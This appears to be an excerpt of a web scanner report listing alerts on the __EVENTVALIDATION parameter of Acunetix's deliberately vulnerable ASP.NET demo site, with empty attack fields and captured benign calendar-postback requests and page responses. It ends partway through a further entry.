URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1177 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,177 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8584&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgBA0nFYe9sIZGRkGkxiDKDalAUlQqNyAAtbn6el3pg%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKQvo3RBQKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCkW7Iy2LctwZm%2FPU0pOoZ1DGV9o8
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:19:52 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgBA0nFYe9sIZGRkGkxiDKDalAUlQqNyAAtbn6el3pg=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKQvo3RBQKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCkW7Iy2LctwZm/PU0pOoZ1DGV9o8" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:White" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1063 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,063 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8374&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMASp1PW2ghkZGRtTUe17YVCaVO7fvdc6WsaDcTiVA%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKQxbmcDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKC%2BhMq1IC2TVB4hY3AYh2t3Il%2BP
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:01:28 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMASp1PW2ghkZGRtTUe17YVCaVO7fvdc6WsaDcTiVA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKQxbmcDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKC+hMq1IC2TVB4hY3AYh2t3Il+P" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:White" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
